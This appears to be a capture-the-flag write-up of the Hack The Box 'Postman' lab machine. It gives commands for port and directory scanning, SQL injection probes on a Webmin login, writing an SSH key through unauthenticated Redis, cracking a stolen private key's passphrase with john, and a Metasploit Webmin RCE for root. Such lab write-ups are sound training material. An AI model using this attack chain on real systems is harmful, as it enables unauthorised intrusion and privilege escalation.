Things I have learned
- How to check Redis’ vulnerability by using redis-cli.
- Detail enumeration with nmap, my first attempt of scanning I did not discover the redis port.
- How to enumerate with redis-cli.
NMAP enumeration
nmap -sC -sV -p- -oN postman 10.10.10.160 -vvv
-p-
this is a shorthand of -p 1-65535
so this option scans all ports.
From the enumeration results they are these ports of interest tcp/80, tcp/6379 and tcp/10000.
Web page
I am looking at the http://10.10.10.160 to see what is interesting, however this is a static web page, whenever it is a webpage it is always good to do web fuzzing with dirb, dirbuster or gobuster.
gobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_result
Browsing the Webmin login page
TCP/10000 is the webmin login page, but the page has an error as it does not have a re-direction.
, at first I added a host entry in my /etc/hosts but this is not necessary, just change to https://10.10.10.160:10000 which presents a login page.
I am trying some easy sql injection test and see if webmin will throw up any sql error with '#
and ' or 1=1#
in username field.
But the webmin login page was not reacting to simple sql injection test.
.
Searching the web I notice webmin 1.9.1 has an “Package updates” remote execution exploit, however to use this I need to get the username and password that can do package update because I have not obtained any credentials yet so I will be coming back to this later.
Exploiting redis 4.0.9 to gain ssh connection
This is a good read on how to exploit redis with redis-cli.
My kali linux did not have the redis-cli so I downloaded it with apt install redis-tools
.
The first is to check if I can execute some commands like config get dir
or config get *
, to connect to Postman use this redis-cli -h 10.10.10.160
or I can execute the command together like this redis-cli -h 10.10.10.160 config get dir
, this config get dir
gets the current home directory of the connected user (which is redis).
Since I can execute the command without authentication, I can change the current working directory and also to save the dbfilename like this:
I can generate my own rsa key pair and submit the public key over to Postman through redis-cli without authentication, these are the steps:
ssh-keygen -t rsa -f /root/htb/postman/id_rsa
where /root/htb/postman/id_rsa is the path I want to save the key pairs.
Insert two newline on both the heading and trailing of the id_rsa.pub like this (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") | tee payload.txt
this payload.txt will be piped to the redis-cli to submit to the Postman.
cat payload.txt | redis-cli -h 10.10.10.160 -x set redis_rsa
Try to establish ssh as redis user to Postman, before ssh do chmod 600
to the rsa pub key like this chmod 600 id_rsa.pub
, then connect with private key like this ssh -i id_rsa redis@10.10.10.160
.
After a ssh connection is gained, I changed directory to /home
and when I listed the directory a directory – Matt – was discovered. The user.txt file was owned by Matt and only user with Matt group can view the file.
.
As expected redis is not in Matt group.
Escalate to Matt user
Find Matt user’s related file with the find
command, by doing this find / -type f -user Matt 2>/dev/null
This command line means to find all files related to Matt user, and hides all error messages by 2>/dev/null
.
There is a key in /opt/id_rsa.bak
checking the permission reveals that others can also view the file.
So I get the contents of the rsa key and pasted it in my own kali linux machine, in HTB whenever you see there is a rsa key get its content and use ssh2john to convert to hash, then use john to crack the password.
I usually use rockyou.txt as wordlist to brute force the rsa key passphrase, john --wordlist=/usr/share/wordlists/rockyou.txt hash
.
The passphrase discovered cannot be used to login directly through ssh with Matt as user.
This is because Matt is denied to logon as ssh.
But…changing to Matt with su - Matt
with the discovered password is ok…
Privilege escalate to root
With Matt’s credential I tried to see if I can use it to logon to webmin
Well Matt has rights to update packages…this makes this exploit very usable…
In my exploitdb the exploit for webmin 1.9.1 Package update remote code execution is available…
Searching the exploit in metasploit I found that the exploit is readily available.
I modified a few parameters in the exploit as below:
The run the exploit and escalated to root.